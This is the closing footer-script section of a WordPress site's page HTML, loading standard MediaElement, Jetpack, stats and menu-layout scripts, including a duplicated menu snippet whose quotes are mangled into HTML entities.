var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.13-9993131&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpApiSettings = {"root":"https:\/\/spartalive.com\/wp-json\/","nonce":"83495bcce8","versionString":"wp\/v2\/"};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/api-request.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4&#038;time=1578960340'></script>
<script type='text/javascript'>
( 'fetch' in window ) || document.write( '<script src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js?ver=3.0.0&#038;time=1578960340"></scr' + 'ipt>' );( document.contains ) || document.write( '<script src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js?ver=3.26.0-0&#038;time=1578960340"></scr' + 'ipt>' );( window.FormData && window.FormData.prototype.keys ) || document.write( '<script src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js?ver=3.0.12&#038;time=1578960340"></scr' + 'ipt>' );( Element.prototype.matches && Element.prototype.closest ) || document.write( '<script src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js?ver=2.0.2&#038;time=1578960340"></scr' + 'ipt>' );
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/dom-ready.min.js?ver=2.5.1&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/a11y.min.js?ver=2.5.1&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/dist/i18n.min.js?ver=3.6.1&#038;time=1578960340'></script>
<script type='text/javascript'>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</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/media-views.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/media-editor.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/media-audiovideo.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/wp-embed.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/_inc/build/spin.min.js?ver=1.3&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js?ver=1.3&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/spartalive.com\/wp-admin\/admin-ajax.php","nonce":"295d466056","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/spartalive.com\/wp-login.php?redirect_to=https%3A%2F%2Fspartalive.com%2Fclassified-sales-for-expositor%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20190102&#038;time=1578960340'></script>
<script async="async" type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.3&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=7.8&#038;time=1578960340'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-202003.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:7.8',blog:'71002396',post:'20175151',tz:'-6',srv:'spartalive.com'} ]);
	_stq.push([ 'clickTrackerInit', '71002396', '20175151' ]);
</script>
  <script src="https://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/js/bootstrap.min.js"></script>
  
  <script>
	var children = jQuery('#menu-header-menu').children().length;
	jQuery(function(){
		if (children > 1) {
			var theMath = 100 / children;
			jQuery('#menu-header-menu li').css('width', theMath +'%');
		}
	});
  </script>
  
<script>
	var children = jQuery

(&#039;#menu-header-menu&#039;).children

().length;
	jQuery(function(){
		if (children > 1) {
			var theMath = 100 

/ children;
			jQuery

(&#039;#menu-header-menu li&#039;).css

(&#039;width&#039;, theMath +&#039;

%&#039;);
		}
	});
  </script>

  </body>
 
</html>